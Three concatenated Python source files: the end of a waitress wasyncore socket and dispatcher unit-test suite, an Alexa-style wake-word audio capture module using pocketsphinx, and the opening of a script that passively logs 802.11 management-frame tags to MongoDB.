self.assertEqual(cap.getvalue(), data * 2)
finally:
join_thread(t, timeout=TIMEOUT)
@unittest.skipUnless(
hasattr(asyncore, "file_wrapper"), "asyncore.file_wrapper required"
)
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
with open(TESTFN, "wb") as file:
file.write(self.d)
def tearDown(self):
unlink(TESTFN)
def test_recv(self):
fd = os.open(TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
with open(TESTFN, "rb") as file:
self.assertEqual(file.read(), self.d + d1 + d2)
@unittest.skipUnless(
hasattr(asyncore, "file_dispatcher"), "asyncore.file_dispatcher required"
)
def test_dispatcher(self):
fd = os.open(TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
def test_resource_warning(self):
# Issue #11453
got_warning = False
while got_warning is False:
# we try until we get the outcome we want because this
# test is not deterministic (gc_collect() may not
fd = os.open(TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
try:
with check_warnings(("", ResourceWarning)):
f = None
gc_collect()
except AssertionError: # pragma: no cover
pass
else:
got_warning = True
def test_close_twice(self):
fd = os.open(TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
os.close(f.fd) # file_wrapper dupped fd
with self.assertRaises(OSError):
f.close()
self.assertEqual(f.fd, -1)
# calling close twice should not fail
f.close()
class BaseTestHandler(asyncore.dispatcher): # pragma: no cover
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_accepted(self):
raise Exception("handle_accepted not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class BaseServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, family, addr, handler=BaseTestHandler):
asyncore.dispatcher.__init__(self)
self.create_socket(family)
self.set_reuse_addr()
bind_af_aware(self.socket, addr)
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()
def handle_accepted(self, sock, addr):
self.handler(sock)
def handle_error(self): # pragma: no cover
raise
class BaseClient(BaseTestHandler):
def __init__(self, family, address):
BaseTestHandler.__init__(self)
self.create_socket(family)
self.connect(address)
def handle_connect(self):
pass
class BaseTestAPI:
def tearDown(self):
asyncore.close_all(ignore_all=True)
def loop_waiting_for_flag(self, instance, timeout=5): # pragma: no cover
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_accepted(self):
# make sure handle_accepted() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
asyncore.dispatcher.handle_accept(self)
def handle_accepted(self, sock, addr):
sock.close()
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send(b"x" * 1024)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# in order to make handle_close be called we are supposed
# to make at least one recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close_after_conn_broken(self):
# Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
# #11265).
data = b"\0" * 128
class TestClient(BaseClient):
def handle_write(self):
self.send(data)
def handle_close(self):
self.flag = True
self.close()
def handle_expt(self): # pragma: no cover
# needs to exist for MacOS testing
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def handle_read(self):
self.recv(len(data))
self.close()
def writable(self):
return False
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
@unittest.skipIf(
sys.platform.startswith("sunos"), "OOB support is broken on Solaris"
)
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
if sys.platform == "darwin" and self.use_poll: # pragma: no cover
self.skipTest("poll may fail on macOS; see issue #28087")
class TestClient(BaseClient):
def handle_expt(self):
self.socket.recv(1024, socket.MSG_OOB)
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(chr(244).encode("latin-1"), socket.MSG_OOB)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else: # pragma: no cover
raise Exception("exception not raised")
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_connection_attributes(self):
server = BaseServer(self.family, self.addr)
client = BaseClient(self.family, server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
# self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(self.family)
# self.assertEqual(s.socket.type, socket.SOCK_STREAM)
self.assertEqual(s.socket.family, self.family)
self.assertEqual(s.socket.gettimeout(), 0)
# self.assertFalse(s.socket.get_inheritable())
def test_bind(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
s1 = asyncore.dispatcher()
s1.create_socket(self.family)
s1.bind(self.addr)
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(self.family)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(socket.error, s2.bind, (self.addr[0], port))
def test_set_reuse_addr(self): # pragma: no cover
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
with closewrapper(socket.socket(self.family)) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except OSError:
unittest.skip("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket(self.family))
self.assertFalse(
s.socket.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
)
s.socket.close()
s.create_socket(self.family)
s.set_reuse_addr()
self.assertTrue(
s.socket.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
)
@reap_threads
def test_quick_connect(self): # pragma: no cover
# see: http://bugs.python.org/issue10340
if self.family not in (socket.AF_INET, getattr(socket, "AF_INET6", object())):
self.skipTest("test specific to AF_INET and AF_INET6")
server = BaseServer(self.family, self.addr)
# run the thread 500 ms: the socket should be connected in 200 ms
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1, count=5))
t.start()
try:
sock = socket.socket(self.family, socket.SOCK_STREAM)
with closewrapper(sock) as s:
s.settimeout(0.2)
s.setsockopt(
socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1, 0)
)
try:
s.connect(server.address)
except OSError:
pass
finally:
join_thread(t, timeout=TIMEOUT)
class BaseTestAPI_UseIPv4Sockets(BaseTestAPI):
family = socket.AF_INET
addr = (HOST, 0)
@unittest.skipUnless(IPV6_ENABLED, "IPv6 support required")
class BaseTestAPI_UseIPv6Sockets(BaseTestAPI):
family = socket.AF_INET6
addr = (HOSTv6, 0)
@unittest.skipUnless(HAS_UNIX_SOCKETS, "Unix sockets required")
class BaseTestAPI_UseUnixSockets(BaseTestAPI):
if HAS_UNIX_SOCKETS:
family = socket.AF_UNIX
addr = TESTFN
def tearDown(self):
unlink(self.addr)
BaseTestAPI.tearDown(self)
class TestAPI_UseIPv4Select(BaseTestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
class TestAPI_UseIPv4Poll(BaseTestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseIPv6Select(BaseTestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
class TestAPI_UseIPv6Poll(BaseTestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseUnixSocketsSelect(BaseTestAPI_UseUnixSockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
class TestAPI_UseUnixSocketsPoll(BaseTestAPI_UseUnixSockets, unittest.TestCase):
use_poll = True
class Test__strerror(unittest.TestCase):
def _callFUT(self, err):
from waitress.wasyncore import _strerror
return _strerror(err)
def test_gardenpath(self):
self.assertEqual(self._callFUT(1), "Operation not permitted")
def test_unknown(self):
self.assertEqual(self._callFUT("wut"), "Unknown error wut")
class Test_read(unittest.TestCase):
def _callFUT(self, dispatcher):
from waitress.wasyncore import read
return read(dispatcher)
def test_gardenpath(self):
inst = DummyDispatcher()
self._callFUT(inst)
self.assertTrue(inst.read_event_handled)
self.assertFalse(inst.error_handled)
def test_reraised(self):
from waitress.wasyncore import ExitNow
inst = DummyDispatcher(ExitNow)
self.assertRaises(ExitNow, self._callFUT, inst)
self.assertTrue(inst.read_event_handled)
self.assertFalse(inst.error_handled)
def test_non_reraised(self):
inst = DummyDispatcher(OSError)
self._callFUT(inst)
self.assertTrue(inst.read_event_handled)
self.assertTrue(inst.error_handled)
class Test_write(unittest.TestCase):
def _callFUT(self, dispatcher):
from waitress.wasyncore import write
return write(dispatcher)
def test_gardenpath(self):
inst = DummyDispatcher()
self._callFUT(inst)
self.assertTrue(inst.write_event_handled)
self.assertFalse(inst.error_handled)
def test_reraised(self):
from waitress.wasyncore import ExitNow
inst = DummyDispatcher(ExitNow)
self.assertRaises(ExitNow, self._callFUT, inst)
self.assertTrue(inst.write_event_handled)
self.assertFalse(inst.error_handled)
def test_non_reraised(self):
inst = DummyDispatcher(OSError)
self._callFUT(inst)
self.assertTrue(inst.write_event_handled)
self.assertTrue(inst.error_handled)
class Test__exception(unittest.TestCase):
def _callFUT(self, dispatcher):
from waitress.wasyncore import _exception
return _exception(dispatcher)
def test_gardenpath(self):
inst = DummyDispatcher()
self._callFUT(inst)
self.assertTrue(inst.expt_event_handled)
self.assertFalse(inst.error_handled)
def test_reraised(self):
from waitress.wasyncore import ExitNow
inst = DummyDispatcher(ExitNow)
self.assertRaises(ExitNow, self._callFUT, inst)
self.assertTrue(inst.expt_event_handled)
self.assertFalse(inst.error_handled)
def test_non_reraised(self):
inst = DummyDispatcher(OSError)
self._callFUT(inst)
self.assertTrue(inst.expt_event_handled)
self.assertTrue(inst.error_handled)
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
class Test_readwrite(unittest.TestCase):
def _callFUT(self, obj, flags):
from waitress.wasyncore import readwrite
return readwrite(obj, flags)
def test_handle_read_event(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.read_event_handled)
def test_handle_write_event(self):
flags = 0
flags |= select.POLLOUT
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.write_event_handled)
def test_handle_expt_event(self):
flags = 0
flags |= select.POLLPRI
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.expt_event_handled)
def test_handle_close(self):
flags = 0
flags |= select.POLLHUP
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.close_handled)
def test_socketerror_not_in_disconnected(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(socket.error(errno.EALREADY, "EALREADY"))
self._callFUT(inst, flags)
self.assertTrue(inst.read_event_handled)
self.assertTrue(inst.error_handled)
def test_socketerror_in_disconnected(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(socket.error(errno.ECONNRESET, "ECONNRESET"))
self._callFUT(inst, flags)
self.assertTrue(inst.read_event_handled)
self.assertTrue(inst.close_handled)
def test_exception_in_reraised(self):
from waitress import wasyncore
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(wasyncore.ExitNow)
self.assertRaises(wasyncore.ExitNow, self._callFUT, inst, flags)
self.assertTrue(inst.read_event_handled)
def test_exception_not_in_reraised(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(ValueError)
self._callFUT(inst, flags)
self.assertTrue(inst.error_handled)
class Test_poll(unittest.TestCase):
def _callFUT(self, timeout=0.0, map=None):
from waitress.wasyncore import poll
return poll(timeout, map)
def test_nothing_writable_nothing_readable_but_map_not_empty(self):
# i read the mock.patch docs. nerp.
dummy_time = DummyTime()
map = {0: DummyDispatcher()}
try:
from waitress import wasyncore
old_time = wasyncore.time
wasyncore.time = dummy_time
result = self._callFUT(map=map)
finally:
wasyncore.time = old_time
self.assertEqual(result, None)
self.assertEqual(dummy_time.sleepvals, [0.0])
def test_select_raises_EINTR(self):
# i read the mock.patch docs. nerp.
dummy_select = DummySelect(select.error(errno.EINTR))
disp = DummyDispatcher()
disp.readable = lambda: True
map = {0: disp}
try:
from waitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
result = self._callFUT(map=map)
finally:
wasyncore.select = old_select
self.assertEqual(result, None)
self.assertEqual(dummy_select.selected, [([0], [], [0], 0.0)])
def test_select_raises_non_EINTR(self):
# i read the mock.patch docs. nerp.
dummy_select = DummySelect(select.error(errno.EBADF))
disp = DummyDispatcher()
disp.readable = lambda: True
map = {0: disp}
try:
from waitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
self.assertRaises(select.error, self._callFUT, map=map)
finally:
wasyncore.select = old_select
self.assertEqual(dummy_select.selected, [([0], [], [0], 0.0)])
class Test_poll2(unittest.TestCase):
def _callFUT(self, timeout=0.0, map=None):
from waitress.wasyncore import poll2
return poll2(timeout, map)
def test_select_raises_EINTR(self):
# i read the mock.patch docs. nerp.
pollster = DummyPollster(exc=select.error(errno.EINTR))
dummy_select = DummySelect(pollster=pollster)
disp = DummyDispatcher()
map = {0: disp}
try:
from waitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
self._callFUT(map=map)
finally:
wasyncore.select = old_select
self.assertEqual(pollster.polled, [0.0])
def test_select_raises_non_EINTR(self):
# i read the mock.patch docs. nerp.
pollster = DummyPollster(exc=select.error(errno.EBADF))
dummy_select = DummySelect(pollster=pollster)
disp = DummyDispatcher()
map = {0: disp}
try:
from waitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
self.assertRaises(select.error, self._callFUT, map=map)
finally:
wasyncore.select = old_select
self.assertEqual(pollster.polled, [0.0])
class Test_dispatcher(unittest.TestCase):
def _makeOne(self, sock=None, map=None):
from waitress.wasyncore import dispatcher
return dispatcher(sock=sock, map=map)
def test_unexpected_getpeername_exc(self):
sock = dummysocket()
def getpeername():
raise OSError(errno.EBADF)
map = {}
sock.getpeername = getpeername
self.assertRaises(socket.error, self._makeOne, sock=sock, map=map)
self.assertEqual(map, {})
def test___repr__accepting(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.accepting = True
inst.addr = ("localhost", 8080)
result = repr(inst)
expected = "<waitress.wasyncore.dispatcher listening localhost:8080 at"
self.assertEqual(result[: len(expected)], expected)
def test___repr__connected(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.accepting = False
inst.connected = True
inst.addr = ("localhost", 8080)
result = repr(inst)
expected = "<waitress.wasyncore.dispatcher connected localhost:8080 at"
self.assertEqual(result[: len(expected)], expected)
def test_set_reuse_addr_with_socketerror(self):
sock = dummysocket()
map = {}
def setsockopt(*arg, **kw):
sock.errored = True
raise OSError
sock.setsockopt = setsockopt
sock.getsockopt = lambda *arg: 0
inst = self._makeOne(sock=sock, map=map)
inst.set_reuse_addr()
self.assertTrue(sock.errored)
def test_connect_raise_socket_error(self):
sock = dummysocket()
map = {}
sock.connect_ex = lambda *arg: 1
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.connect, 0)
def test_accept_raise_TypeError(self):
sock = dummysocket()
map = {}
def accept(*arg, **kw):
raise TypeError
sock.accept = accept
inst = self._makeOne(sock=sock, map=map)
result = inst.accept()
self.assertEqual(result, None)
def test_accept_raise_unexpected_socketerror(self):
sock = dummysocket()
map = {}
def accept(*arg, **kw):
raise OSError(122)
sock.accept = accept
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.accept)
def test_send_raise_EWOULDBLOCK(self):
sock = dummysocket()
map = {}
def send(*arg, **kw):
raise OSError(errno.EWOULDBLOCK)
sock.send = send
inst = self._makeOne(sock=sock, map=map)
result = inst.send("a")
self.assertEqual(result, 0)
def test_send_raise_unexpected_socketerror(self):
sock = dummysocket()
map = {}
def send(*arg, **kw):
raise OSError(122)
sock.send = send
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.send, "a")
def test_recv_raises_disconnect(self):
sock = dummysocket()
map = {}
def recv(*arg, **kw):
raise OSError(errno.ECONNRESET)
def handle_close():
inst.close_handled = True
sock.recv = recv
inst = self._makeOne(sock=sock, map=map)
inst.handle_close = handle_close
result = inst.recv(1)
self.assertEqual(result, b"")
self.assertTrue(inst.close_handled)
def test_close_raises_unknown_socket_error(self):
sock = dummysocket()
map = {}
def close():
raise OSError(122)
sock.close = close
inst = self._makeOne(sock=sock, map=map)
inst.del_channel = lambda: None
self.assertRaises(socket.error, inst.close)
def test_handle_read_event_not_accepting_not_connected_connecting(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
def handle_connect_event():
inst.connect_event_handled = True
def handle_read():
inst.read_handled = True
inst.handle_connect_event = handle_connect_event
inst.handle_read = handle_read
inst.accepting = False
inst.connected = False
inst.connecting = True
inst.handle_read_event()
self.assertTrue(inst.connect_event_handled)
self.assertTrue(inst.read_handled)
def test_handle_connect_event_getsockopt_returns_error(self):
sock = dummysocket()
sock.getsockopt = lambda *arg: 122
map = {}
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.handle_connect_event)
def test_handle_expt_event_getsockopt_returns_error(self):
sock = dummysocket()
sock.getsockopt = lambda *arg: 122
map = {}
inst = self._makeOne(sock=sock, map=map)
def handle_close():
inst.close_handled = True
inst.handle_close = handle_close
inst.handle_expt_event()
self.assertTrue(inst.close_handled)
def test_handle_write_event_while_accepting(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.accepting = True
result = inst.handle_write_event()
self.assertEqual(result, None)
def test_handle_error_gardenpath(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
def handle_close():
inst.close_handled = True
def compact_traceback(*arg, **kw):
return None, None, None, None
def log_info(self, *arg):
inst.logged_info = arg
inst.handle_close = handle_close
inst.compact_traceback = compact_traceback
inst.log_info = log_info
inst.handle_error()
self.assertTrue(inst.close_handled)
self.assertEqual(inst.logged_info, ("error",))
def test_handle_close(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
def log_info(self, *arg):
inst.logged_info = arg
def close():
inst._closed = True
inst.log_info = log_info
inst.close = close
inst.handle_close()
self.assertTrue(inst._closed)
def test_handle_accepted(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.handle_accepted(sock, "1")
self.assertTrue(sock.closed)
class Test_dispatcher_with_send(unittest.TestCase):
def _makeOne(self, sock=None, map=None):
from waitress.wasyncore import dispatcher_with_send
return dispatcher_with_send(sock=sock, map=map)
def test_writable(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.out_buffer = b"123"
inst.connected = True
self.assertTrue(inst.writable())
class Test_close_all(unittest.TestCase):
def _callFUT(self, map=None, ignore_all=False):
from waitress.wasyncore import close_all
return close_all(map, ignore_all)
def test_socketerror_on_close_ebadf(self):
disp = DummyDispatcher(exc=socket.error(errno.EBADF))
map = {0: disp}
self._callFUT(map)
self.assertEqual(map, {})
def test_socketerror_on_close_non_ebadf(self):
disp = DummyDispatcher(exc=socket.error(errno.EAGAIN))
map = {0: disp}
self.assertRaises(socket.error, self._callFUT, map)
def test_reraised_exc_on_close(self):
disp = DummyDispatcher(exc=KeyboardInterrupt)
map = {0: disp}
self.assertRaises(KeyboardInterrupt, self._callFUT, map)
def test_unknown_exc_on_close(self):
disp = DummyDispatcher(exc=RuntimeError)
map = {0: disp}
self.assertRaises(RuntimeError, self._callFUT, map)
class DummyDispatcher:
read_event_handled = False
write_event_handled = False
expt_event_handled = False
error_handled = False
close_handled = False
accepting = False
def __init__(self, exc=None):
self.exc = exc
def handle_read_event(self):
self.read_event_handled = True
if self.exc is not None:
raise self.exc
def handle_write_event(self):
self.write_event_handled = True
if self.exc is not None:
raise self.exc
def handle_expt_event(self):
self.expt_event_handled = True
if self.exc is not None:
raise self.exc
def handle_error(self):
self.error_handled = True
def handle_close(self):
self.close_handled = True
def readable(self):
return False
def writable(self):
return False
def close(self):
if self.exc is not None:
raise self.exc
class DummyTime:
def __init__(self):
self.sleepvals = []
def sleep(self, val):
self.sleepvals.append(val)
class DummySelect:
error = select.error
def __init__(self, exc=None, pollster=None):
self.selected = []
self.pollster = pollster
self.exc = exc
def select(self, *arg):
self.selected.append(arg)
if self.exc is not None:
raise self.exc
def poll(self):
return self.pollster
class DummyPollster:
def __init__(self, exc=None):
self.polled = []
self.exc = exc
def poll(self, timeout):
self.polled.append(timeout)
if self.exc is not None:
raise self.exc
else: # pragma: no cover
return []
|
alexa_audio.py | #!/usr/bin/env python3
import threading
import math
import struct
import time
import alexa_audio_device
import logging
from subprocess import Popen, PIPE, STDOUT
from pocketsphinx import *
DETECT_HYSTERESIS = 1.2 # level should fall lower that background noise
DETECT_MIN_LENGTH_S = 2.5 # minimal length of record
DETECT_MAX_LENGTH_S = 10 # minimal amount of buffers to activate
DETECT_BUFFERS_FOR_INIT = 10 # number of buffers for initialising
class AlexaAudio:
def __init__(self, threshold, callback):
self.ad = alexa_audio_device.AlexaAudioDevice()
self.callback = callback
self.beep_finished_buf = self._beep(150, 1000)
self.beep_short_buf = self._beep(150, 3000)
self.beep_failed_buf = self._beep(600, 400)
self.is_run = True
self.average = 100.0
self.init_counter = 0
self.skip = 0
# init pocketsphinx
config = Decoder.default_config()
config.set_string('-hmm', os.path.join(get_model_path(), 'en-us'))
config.set_string('-dict', os.path.join(get_model_path(), 'cmudict-en-us.dict'))
config.set_string('-logfn', '/dev/null')
config.set_string('-keyphrase', 'alexa')
logging.info("Voice threshold is " + str(threshold))
config.set_float('-kws_threshold', threshold)
self.decoder = Decoder(config)
self.decoder.start_utt()
self.capture_in_progress = False
self.buffer = None
self.notify = True
self.pt = threading.Thread(target=self.processAudio)
self.pt.start()
def _beep(self, length_ms = 150, frequency = 1000.0, framerate = 16000, amplitude = 0.2):
period = int(framerate / frequency)
snd = bytes()
for i in range(0, int(framerate * length_ms / 1000)):
val = 32767.0 * amplitude * math.sin(2.0 * math.pi * float(i % period) / period)
snd += struct.pack('<h', int(val))
return snd
def beep_finished(self):
self.play(self.beep_finished_buf)
self.ad.flush()
def beep_short(self):
self.play(self.beep_short_buf)
self.ad.flush()
def beep_failed(self):
self.play(self.beep_failed_buf)
self.ad.flush()
def start_capture(self, notify = True):
self.beep_short()
self.capture_in_progress = True
self.detect_buffer = bytes()
self.detect_buffer_max = 0
self.notify = notify
def processAudio(self):
logging.info("Audio Processing started.")
while self.is_run:
buf = self.ad.read(16000)
if buf is None:
logging.info("Alexa audio processing exit")
break
if self.skip > 0:
self.skip -= len(buf)
continue
level = 0
for i in range(0, len(buf), 2):
val = struct.unpack_from('<h', buf, i)[0] # 16 bit little endian
level += abs(val)
level = level / (len(buf) / 2)
if self.capture_in_progress:
self.detect_buffer += buf
if level > self.detect_buffer_max:
self.detect_buffer_max = level
duration = len(self.detect_buffer)/16000/2
if duration >= DETECT_MAX_LENGTH_S or (
duration >= DETECT_MIN_LENGTH_S and
level < self.average * DETECT_HYSTERESIS):
self.capture_in_progress = False
if self.detect_buffer_max > self.average * DETECT_HYSTERESIS:
logging.info("Finished " + str(duration) + "s")
self.buffer = self.detect_buffer
if self.notify:
threading.Thread(target=self.callback).start()
self.skip += 16000
#self.play(self.detect_buffer)
else:
logging.info("Cancel " + str(duration) + "s due to the low level ")
#self.beep_failed()
else:
self.decoder.process_raw(buf, False, False)
if self.decoder.hyp() != None and self.init_counter > DETECT_BUFFERS_FOR_INIT:
self.start_capture()
self.detect_buffer += buf
logging.info("Found Alexa keyword")
self.decoder.end_utt()
self.decoder.start_utt()
else:
if self.init_counter <= DETECT_BUFFERS_FOR_INIT:
if self.init_counter == DETECT_BUFFERS_FOR_INIT:
logging.info("Alexa is initialized and started.")
self.init_counter += 1
self.average = self.average * 0.75 + level * 0.25
logging.info("Audio Processing finished.")
def close(self):
self.is_run = False
self.pt.join()
self.ad.close()
def get_audio(self, timeout = None):
if timeout is not None:
self.start_capture(False)
for i in range(int(timeout)):
if(self.buffer is not None):
break
time.sleep(1)
if self.buffer is None:
if self.detect_buffer_max > self.average * DETECT_HYSTERESIS:
res = self.detect_buffer
self.capture_in_progress = False
logging.info('Timeout exceed, phrase might not be completed')
self.beep_finished()
return res
else:
logging.info('Timeout exceed, but nothing was detected')
self.beep_failed()
return None
res = self.buffer
self.buffer = None
if res is not None:
self.beep_finished()
return res
def play(self, audio):
self.skip += len(audio)
self.ad.write(audio)
def play_mp3(self, raw_audio):
p = Popen(['ffmpeg', '-i', '-', '-ac', '1', '-acodec',
'pcm_s16le', '-ar', '16000', '-f', 's16le', '-'],
stdout=PIPE, stdin=PIPE, stderr=PIPE)
pcm = p.communicate(input=raw_audio)[0]
self.play(pcm)
|
wardriver.py | """
wardriver.py - Collects 802.11 Management Frame Tags/Parameters for analysis
Author: Axel Persinger
License: MIT License
"""
"""
Imported Libraries
argparse - Argument parser
pymongo - MongoDB library
threading - Threading library for console output
time - Sleep
tabulate - Pretty output tables
scapy - Python Networking library for sniffing
"""
import argparse
import pymongo
import threading
import time
import tabulate
import scapy.layers
import scapy.layers.dot11
import scapy.sendrecv
import scapy.utils
"""
Global Variables
_client - MongoDB Client
_stats - Packet capture statistics
"""
_client = None
_stats = {}
def console():
"""
Outputs statistics of captured packets
"""
while True:
# Clear the screen
print("\033c\033[3J", end='')
# Aggregate results from DB
results = _client.MFDoom.WarDriver.aggregate([
{"$group": {"_id": "$TagID", "count": {"$sum": 1}}},
{ "$sort": { "count": -1 } }
])
# Print current session results
print("Session Results:")
print(tabulate.tabulate(sorted(_stats.items(), key=lambda x: x[1]), headers=["ID", "Count"]))
print()
# Print global results
print("All Results:")
print(tabulate.tabulate(sorted([(i['_id'], i['count']) for i in results], key=lambda x: x[1]), headers=["ID", "Count"]))
time.sleep(3)
def log_layers(pkt: scapy.packet):
"""
Logs the various 802.11 Tag Layers in the packet
:param pkt: Packet that was sniffed
:type pkt: scapy.packet
"""
global _stats
